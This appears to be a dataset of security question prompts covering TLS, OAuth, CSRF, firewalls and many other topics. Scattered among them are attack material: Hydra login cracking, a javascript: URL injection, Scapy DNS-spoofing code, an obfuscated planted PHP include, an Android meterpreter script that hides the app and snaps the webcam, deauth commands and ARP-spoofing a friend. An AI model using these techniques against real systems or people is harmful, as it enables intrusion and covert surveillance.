instruction
stringlengths
24
29.9k
So here it is, I had time to kill, so I used it to hack into my own gmail address with THC Hydra. (very fun I know). So I checked out some old forums and gradually learned how to do it. I understood the overall functioning of THC Hydra, whether it is the dictionary system or brutforce, the password and user lists. But...
I am getting a presentation together for a topic I am not SUPER knowledgeable in. I am an admin within a nameless system, and of the opinion that a service account should be created for each individual integration(rather than sharing an integration account across multiple integration points). Let's say, for example...
Like so. Can I inject javascript into image urls, like this? <img src="javascript:alert("haha! you are hacked!">
I was testing rate limit on the login page of a site. It was captcha protected. I could not even intercept the POST request on burp, so from Google Chrome I looked at the logs and in its POST request, it was passing this captcha parameter and also other recaptcha requests. So then I ran Firefox again which is connecte...
I'm new to infosec. I'm studying about various encryption algorithms. Based on what I've found so far, I think HMAC and Digital signature are almost the same except whether the key is symmetric or asymmetric. For me, it seems that a complexity of HMAC is lower than the digital signature according to its function. Then ...
Git commit signatures seems the signature signs the commit message, but I can't find much information on what the signatures actually solve, and don't understand the git architecture. If I have a repository which began unsigned but moved to a signed model, can a malicious user with write access perform any of the foll...
I was going through the list of top 100K passwords and found Sojdlg123aljg near the top of the list. Does anyone have any idea why this is such a common password?
From https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication, it says: A potential security hole that has recently been fixed by browsers is authentication of cross-site images. From Firefox 59 onwards, image resources loaded from different origins to the current document are no longer able to trigger H...
I've received an email to my gmail account from FCMB, a bank in Nigeria (flashing warning lights already). It's not addressed to me (i.e., the email starts off "Dear Daniel," [not my name]). But the email address is mine. When I look at the headers in Google, it really does look to me like Google received it direct...
Background Recently observed researchers reporting bugs related to a situation where a website would not invalidate secondary (separate) active session once 2FA/MFA has been enabled in primary session. Scenario Consider user1 on website.com has 2FA disable. user1 logs into two separate sessions user1 enables 2FA in on...
Is there a command that determines the complete list of ciphers and digests supported by af_alg for any given version of openssl. Note that I am using openssl 1.1.1
We have a legacy application on spring mvc and we have a web service exposed (SOAP protocol) for some reporting client app. This service was tested by a security team and the report indicates that the service is vulnerable to XSS attack. The proof provided in the report indicates that they injected malicious code in th...
This question was motivated by this 2018 article by the Electronic Frontier Foundation that discusses the findings from the Mark Rettenmaier case. For a bit of background on that case, this article at ocweekly.com explains Rettenmaier is a prominent Orange County physician and surgeon who had no idea that a Nov. 1, ...
I am now in Poland and see these everywhere: The plate can rotate freely,when you insert the key, matching the groove, you rotate the key so it is aligned with the lock and then insert the key. What is the purpose of this?
Is it enough to rely on a web application firewall for protection against SQL injection? or should I use other techniques? During a conversation with a friend he said it is enough to use web application firewall which I disagreed with and my reasons are: the web application firewall is not configured by us we cannot ...
Apologies for what might seem like a naive question, but there is a detail to PKI architecture between clients and servers, the answer to which I have so far not been able to come across no matter where I search. Please indulge me in the following scenario so that there is no ambiguity to what I mean by "client." Suppo...
I am looking into local DNS spoofing by sniffing DNS-requests with Scapy, and sending a spoofed packet in response. Here is the code I used: from scapy.all import * def spoof_dns(pkt): if (DNS in pkt and b'facebook.com' in pkt[DNS].qd.qname): IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) UDPpkt = UD...
im looking to allow a previously GET request of a url like: myurl.com/site/id/1 where the value 1 in this case - is a pseudo random and not too difficult to guess. I'm looking to bring this id/1 key/value into my request BODY . Is this more secure by using POST and putting the key and value into the request BODY, than ...
I try to understand phishing email received from an attacker: Received: .... Received: .... Received-SPF: Pass (sender SPF authorized) identity=mailfrom; client-ip=; helo= envelope-from:attacker@infected_website.com;receiver=victim@legit_site.com Received: from mout.gmx.com ( []) by (Postfix) with ESMTPS id = ...
I am looking into putting a Firewall in front of our web servers. But we just recently implemented new next-gen firewalls. Does it make sense to put a WAF in front of our web servers as well?
We are developing an application, that is using client certificate needed for client authentication (HTTPS connection) when using a specific web service. When a customer company has hundreds of computers, the IT admin has to install this client certificate on each computer (and every year when the client cert is renewe...
I'm helping out a friend with a PHP website he has been running for a few years. He is not PHP developer, so he asked if I could help him out. I download the contents of the server files onto my laptop and found a strange hex code embedded in the top of the page <?php @include("\164\166\163\150\157\167\163\057\151\155a...
I've been thinking about this subject, and found paradoxical fact. Having a service that has 2-step authorization using SMS might become more harmful and open vulnerability hole (read SMS can be intercepted ), then being without using 2-FA at all. example for Google, FB or any major services: With 2-step SMS authentica...
Say I have a hypothetical PHP application which will store hashed passwords in a file in the same directory. At first, this seems like it would be very insecure, since one could guess at the name of the file and open it via a web browser (http://example.com/php-app/hashed_passwords.txt). However, I was wondering about ...
Not on purpose I did a reverse IP address look up on my site, and it shows that there are three other websites hosted on my server, and now I'm worried. My web is arturofm.com, and here is the lookup: https://reverseip.domaintools.com/search/?q=arturofm.com It says: Reverse IP Lookup Results — more than 3 domains host...
Basically another administrator wants a subordinate CA certificate for their fancy appliance. How do I restrict the subordinate CA certificate issued to them only able to issuing for their usages and not allowing them to issue certificate that are used else where. Having subordinate CA that is not under control is pret...
I grabbed the password hash from a domain's Groups.xml file and decrypted the hash. However the decrypted password contains characters "%" and "^", and I'm having problems using it with winexe. No matter what I try, it tells me the credentials are incorrect. I'm trying: winexe -U Administrator%test^pass%1234 //lab-host...
Here is the code: <?php $file=trim($_GET['img_name']); //echo $file; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'...
Between version 4.4 and 9, Android supported Full-Disk Encryption (FDE). On Android 7, a new system called File-Based Encryption (FBE) was introduced, and was subsequently made mandatory on Android 10. The primary upside cited in the page for File-Based Encryption is the usage of Direct Boot, allowing you to use specif...
I have some API that should be accessible from a very long list of devices (some of them can reach my Oauth2 server and get some token, some of them cannot). These devices are mobile phones (IOS, Android) and in the future could be any device that has an HTTP client. But I need to secure my API from everyone. I'm think...
I'm working on a Linux powered consumer electronics. Everything user interacts with is running as root (legacy design). Should I make the application run as its own user with restrictions?
I have two nodes that need to communicate, A is sending data to B. We just assume that AES-256 key is already shared across the nodes. The only data being sent from A to B are a few bytes commanding a light bulb: Light ON: 08 09 0A 01 [8 byte counter] Light OFF: 08 09 0A 00 [8 byte counter] Now, to protect the commun...
I've recently became baffled as to how often is there an attempt to use a web-camera on my laptop. And I mean - out of the blue, when I had neither an intent nor a context to use it. How do I know it's used? Well, I have an AV which has a function "block usages of a device X" (X can be a microphone or a web-camera for...
Is it possible to track someone by sharing a youtube link with them with a timestamp such as &t=1s if they click on it on their end? I've recently have been told not to use timestamps because of this...
Hypothetically speaking, let's say I purchase the domain eve-mail.com and get a cert via LetsEncrypt. I then use a reverse proxy to point to the reputable and widely used alice-mail.com. Connecting to eve-mail.com would present with a but would allow for the sniffing of clear text data between the client and alice-ma...
We are building a few corporate apps for field workers / front office. In most cases each user will have their own device, but there are some shared devices (for example reception). The devices are going to be Android and we are planning to develop native apps. Giving that these are Android devices / apps, is there any...
Our security is changing, so I'm updating an Angular SPA application to use OpenID Connect. I found a nice library to help set things up. However, I've run into an issue where it tries to access the JWKS endpoint unsuccessfully; it's blocked by CORS even though my application has been whitelisted. Neither I nor my cybe...
Are internal components vulnerable to BadUSB? Say you have a laptop. Even if you don't use any USB devices (like mice and keyboard), if the laptop has internal components that connect through USB (like a webcam and fingerprint reader) could these have their firmware modified in order to persistently infect a machine?
We have a jump box that allows people to connect via SSH into the system. Would it be a security concern by adding a public DNS entry that points to the jump box? (Would this not be security through obscurity?) Assuming our system is hardened, there is really nothing wrong with having a DNS entry to the jump box.
As said here, a CSRF attack has little to do with SOP. However, on the OWASP CSRF page it is said that Fortunately, this request will not be executed by modern web browsers thanks to same-origin policy restrictions. This restriction is enabled by default unless the target web site explicitly opens up cross-origin requ...
We are developing an iOS application and server where a user will be able to store some personal information and top up money. I have been reading about the OAuth Authorization flow using PKCE and seems to be the right thing to do. Still from the user experience point of view I don't like that the iOS app needs to use ...
I wrote a VCL app using Delphi10.2. It has a simple activation setup, encrypted key is stored in Kinvey backend. The key to decrypt the encrypted key is hidden in the source code. Now in order to establish the HTTPS connection, the app needs Indy's ssl files libeay32.dll and ssleay32.dll. They are attached in the same ...
I write short erotic stories that I want to sell safely online. Is it possible to sell an ebook while protecting my true identity from the buyers? Say I use a free Wordpress + Stripe + SimpleGoods. Will my identity be protected from the buyers? Stripe and SG will know about me but I guess they don't publicise there cu...
Android documentation about keystore system has a sub-section Choose between a keychain or the Android keystore provider, it says we should use the KeyChain API when we want system-wide credentials. What is a system wide credential? When should I use it? Can you explain it with an example?
Let's set the scene with two servers: an "auth" server which provides users with authorization tokens containing claims relevant to their account a "paywall" server, which after receiving payment from a user, will send a request to the auth server to add the "premium" claim to the user's account (and also this server ...
I'm trying to get a full answer to an interview question I got asked a while ago that keeps coming back to haunt me at night. Hoping that I can get a clearer picture of it here, or at least a link to somewhere that explains the process (I haven't found one that satifies my curiosity). The question is: if you are tryi...
As stated in the title, are there any existing best practices to install Debian on a remote server, without sending clear text passwords over the link? For example - a lot of dedicated server providers will give their customers direct access to the KVM of the supermicro board. This gives them a lot of choices - for exa...
I'm trying to figure out how to generate private key for the Root CA according the principles of WebTrust. One additional requirement I have that the generate private key should be then imported to any HSM, independent of the vendor. I have never done any WebTrust audit, so I am not able to figure out if something like...
I'm really confused about a CSRF token implementation in a Spring web app that I've inherited. Basically, everyone can request the token by looking at what Spring Security filters do: http .exceptionHandling() .authenticationEntryPoint(new RestAuthenticationEntryPoint()) .and() ...
The computers on our office building are (via BIOS) configured to boot PXE as first option. This is a useful setting, as long as, when needed, we can remotely restore non-booting machines and all that stuff. But, if someone sets up a rogue PXE server, machines could be compromised at next reboot (i.e: automatic Windo...
Our medical device has embedded processors and a USB port used for firmware updates and logfile transfers. The usual USB viruses are not a concern (no mechanism to load or execute them, wouldn't run in our unique environment). However a secure upgrade method is required by a regulatory agency, in case of malicious at...
Say I want to exchange a key with someone for a symmetric cipher (say AES) without meeting them in person. What would be the most secure way to do this over the Internet? My first instinct would be using a custom RSA channel over HTTPS to provide the most security. I need the most future-proof method possible. (keep in...
we have a CA certificate template to verify, which contains an extendedkeyusage extension with the following values "clientAuthentication" "emailProtection" and "id-kp-OCSPSigning" Is this a mistake or is there really a usecase for extendedkeyusage in a CA certificate?
Is it so easy to hack mongodb database? I created a mongodb database and added users. If I want to allow access only to these users I need to add the following parameters to the config file: security: authorization: enabled setParameter: authenticationMechanisms: SCRAM-SHA-1 After adding those parameters to the c...
I see this EFF tool guide, proposing WhatsApp as one of "our pick of the best, most secure applications" source. How can WhatsApp be trusted as a secure application when it is not open-source (according to Wikipedia: "license: freeware"), in contrast to Signal (according to Wikipedia: "All Signal software are free and ...
I have a Windows Server 2008 R2 with an Oracle database running on it. Someone who knows my Oracle username and password claims that he can create a Windows system account somehow. And then he can control the whole server and do whatever he wants. Is it possible to do so? Sound incredible to me.
I am just getting into CTF and Hacking in general. I am very confused as to why this worked when I added an apostrophe to the end it reveals the flag. I have Burp Community Edition suite going and I have HTTP live headers. I am just not trying understanding how adding http://example.com/page/edit/2' gives the flag whi...
When creating a PGP key, you can choose when the key "expires". What does this mean and how does it work?
Server-based apps check for a session cookie before returning any content to the user. If an authentication cookie isn't sent from the user's browser, the only content delivered to the user is a redirect/error message. I'm new to server-less apps. In the several Javascript S3/Cognito-based tutorials I saw (for example...
I want my meterpreter to execute the command as soon as it gets the session. My payload is android/meterpreter/reverse_tcp I want a file that can execute these commands automatically as soon as meterpreter session is opened: hide_app_icon webcam_snap What will be the commands to be put in an .rc file for android rever...
I encountered a puzzling situation the other day when I plugged in a USB flash drive. Windows defender displayed an alert saying that a threat had been quarantined, specifically the Jenxcus VBS virus. This is especially alarming given the preceding events. This flash drive is one I have had for a while but was empty. I...
Background: We're developing for a Debian 9.8 system on an x86, but most of us here are more used to dealing with embedded devices. according to wikipedia, secure boot can "secure the boot process by preventing the loading of drivers or OS loaders that are not signed with an acceptable digital signature". I take this ...
Email clients like Spark for macOS have a feature where a user can send an email later, at any given time, even when the computer is turned off. An SMTP server needs a password based authentication, though. Does that mean that if I use Spark to send an email later, my password gets sent over to Spark servers in plainte...
Site A will be having an <img> tag with src= attribute as an absolute URL pointing to site B. Site B will return an image response, and in that response a cookie will be set (cookie of Site B's domain). This is being done because safari browser blocks cookies set from iframe sites. By doing so the iframe site here (sit...
I'm trying to exploit a buffer overflow vulnerability in MIPS architecture. ASLR is enable, but the binary compiled without PIE (hence loaded always to 0x00400000). However, the vulnerable code uses strcpy, so I cannot overwrite the $ra register with an address that contains null bytes (0x0040xxxx). Any ideas how to ov...
I used SonarQube to perform a static code analysis of my project and it detected a security vulnerability in one of my CSS files: For security reasons, protocol-relative URLs should not be used. Noncompliant Code Example @font-face { src: url("//myfont"); } Compliant Solution @font-face { src: url("https://myf...
To make a prank on a friend, and also for educational purposes, I am trying to hack a DNS server in my local network. I am using Windows. I used arpspoof from GitHub. Can someone please elaborate on how to take the next step on altering the default DNS server on a router? Or is there any source code I can study which i...
I will integrate with a new application on the next weeks. But something that was told to me by the partner team was very strange. The partner ask us to pass one .CSR file with our company information: name, address, etc. After that they signed this file and send back to us. Until here, ok. But after that, they said so...
Are there risks associated with using gsub on user input? Can it be used for regular expression DoS?
I was researching the GitHub DDoS attack of 2018, in which memcached UDP amplification was used. I noticed that a GitHub blog post referenced a CloudFlare post which described memcached-based UDP amplification attacks in general. At one point, CloudFlare suggests that - if you must use UDP - to make the response packet...
When I was reading about web servers, I came to know that though servers listen to static port (say port 80 for http), immediately after the connection, they assign a different port and thread to process. This helps in scalability; otherwise the server cannot listen to the static port until the processing of the previ...
Why do we need to be careful when 'clicking' things? In other words, why do most security breaches involve clicking? Why doesn't simply loading something already constitute an issue? Why is the act of clicking the barrier between safety and risk?
There's a lot one can do to protect his self identity and from being tracked on standard computer machine, but I wonder if there's any way to do so(or at least as close as it possible) on the Android phones? For example, how can one make sure Google won't get access to his contact list? I'm not talking about setting th...
Some business laptops have a fingerprint reader, and Windows has the ability to use your fingerprint to log into an account in lieu of a typed password. I understand that these open up lines of attack because of their physical nature, but I want to know how secure are the actual algorithms tied to these fingerprint log...
I'm starting out in Malware Research / Malware Analysis. I am reading a book called "Practical Guide to Malware Analysis," which touches this in the 2nd chapter, before approaching Dynamical Analysis (malware detonation). However, it mentions 2 options for Virtualization approach: Set Network Adapter to Host-Only. Tha...
Earlier today, I wanted to access the admin web server of my router. But for some reason, I was not able to access it, the web browser telling me there was no server on that address. I had internet connection, so I was a bit surprised. I first pinged my router, which worked fine. Then, after checking my route, which se...
This might be an incredible dumb question but I need to know if this concept is even possible. I have obtained a low privileged shell on a target machine. After doing some enumeration I know the host to be vulnerable to EternalBlue but port 445 is blocked by firewall restrictions. Is it possible to forward port 445 to ...
I'd like to notify my users if a login happens from a new device. Like Google does for Gmail logins. Android ID and IMEI usage for tracking is discouraged by google. How can I track devices without using hardware identifiers? What is the best way to track devices without violating users privacy?
I'm trying to crack a password I set on a zip file using Hash Suite but it doesn't seem to work for me (not sure if I'm doing everything correctly). Basically, this is what I've done: Created a text file, compressed it to a zip file with WinRar and set a password to it (pw: 123). Opened Hash Suite -> Hash Calculator...
I built a landing page with a "sign up with your email to get notified" sort of thing. The button executes some AJAX and submits to a PHP file which sends an email to me. Now, I'm getting a bunch of signups, but I've never advertised the link. I do see that it has been indexed by Google. These emails look semi-legitima...
I have been reading up on Buffer Overflows and NOP Sleds. I tried to use the exploit on an example target and I got stuck because I needed to inject a null byte in the return address for my BP so that my program does not crash. I have become aware of the fact that it is not possible to call a C program from command-lin...
Someone in an interview today told me every firewall has two rules: explicit allow at the top and explicit block at the bottom. Form the way I've always understood things firewalls are normally set to explicitly block by default (or explicitly allow if changed). Is this true? If so, why?
Server: SSL Certificate, 2048-bit RSA Public Key, Signature Algorithm is sha256RSA What am I missing here? ! I've scoured the RFC's, and I have yet to find anything on how to determine the ECDHE key size (or any key exchange algorithm key size) in a TLS cipher suite. I need to confirm that ECDHE is at least 256 bits f...
If the device is plugged in when the user is already logged in, then of course the device can just pretend to be a keyboard, open a terminal, and run a compromising command. (shortcuts for terminals may vary, but are usually somewhat consistent). This can happen very quickly, too, so sometimes users may not notice. But...
I am trying to deauth my laptop which is connected to my home wifi. aireplay-ng has no effect on my laptop. The commands I used are in order airmon-ng start wlan0 then after getting the mac address of the access point and my laptop i use aireplay-ng -0 1000 -a (mac address of AP) -c (mac address of laptop) wlan0mon th...
For our REST API architecture, we are currently thinking over two options - Json Web Token - pros are that it is industry standard, we pass a key which adds a layer of access control and using which we can also add secondary authorisation restrictions at our backend, maintenance of session and related security feature...
I am a newbie to block cipher and when learning the CBC mode, I start to understand that an IV is being used in this mode and also will be transferred to the message receiver. So here is my question, what if the IV is tampered? CBC mode can help to protect the integrity, but the IV is not encrypted, right?
I already know how to add Subject Alternative Names (SANs) to a Certificate Signing Request and I know it's possible to manually add once again to a certificate which is similar to add SAN to csr using OpenSSL like this: openssl x509 -req -extfile < (printf "subjectAltName=IP:xxx" -days xxx -in xxx.csr -signkey xxx.key...
During my first deauthentication attack the client I targeted was disconnected from the wireless network, however I was able to reconnect the client to the network even though aireplay-ng was still sending deauthentication packets. The device was an iPhone XR. I found that some routers have deauth mitigation built in (...
A tester mark this as a vulnerability in the web application that a session id is in the post request instead of cookie header.
Today one of our certificates expired and I needed to order a new one. When collecting all the data needed to create a new one, I got the idea that all needed information is already contained in the expired existing certificate. Are there any security threats when sending a expired certificate (x.509, private key) to s...
I don't quite understand what the difference is between TLS and a certificate. TLS secures the transmission by encrypting the data. So normally no man in the middle attack is possible and nobody else can read it. What is the certificate used for? When does this come into play? What does the certificate do technically? ...
I'm a security newbie trying to scan a VPN in the range 10.0.0.0 - 10.0.15.254 using nmap on Kali Linux. The routing table: route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 10.0.2.2 0.0.0.0 UG 100 0 0 eth0 10.0.0....
We discovered a vulnerability in wide range of Ricoh printers, where with a simple PostScript file sent directly, it is possible to crash the device. To recover you need physical access to the printer and an administration account to clear the queue (otherwise, after the restart, the crash will occur again). This offer...
I'm developing a desktop app for use internal to my company. The app's installation file is located on our company server and therefore is only accessible to authenticated employees (under the assumption our network is secure). If I were to connect to a remote database (such as AWS), would that pose a risk to exposin...
I have a question about Clickjacking. The question is quite simple. Imagine a login flow like this: You visit the application login page, eg https://example.com/login.html. There is no Clickjacking protection (i.e. the X-Frame-Options header) on this page. This page redirects you to the SSO page to actually login, e....
I wasn't able to find a similar question explaining the considerations of the RFC6749 specification when it comes to redirecting the user from the authorization server to the client. In the RFC document, under 3.1.2, it states The endpoint URI MUST NOT include a fragment component. How come this is "MUST NOT"? Are th...
I'm using a scanner which passes subtraction attack traffic such as (1-1), (3-2), (5-2), etc. There are no break or continuation characters such as semicolons or &&, nor is there a comparison using an equals sign or similar (and not function call). These are submitted using POST as part of a form. Is this possible?
With a client side java application that interacts with the server over http, is it possible to handle certificate pinning strictly at the network layer? Meaning, if the certificate is pinned on a load balancer that handles the connection between the client application and server. This article sounds like it only appli...
We currently use a PaaS solution for our web application and db for a Ruby on Rails environment and PostgreSQL. In an on-premise solution, we had servers that we managed ourselves and had antivirus solution installed on these servers. Does it make sense to have AV service on a PaaS that is provided and integrated by th...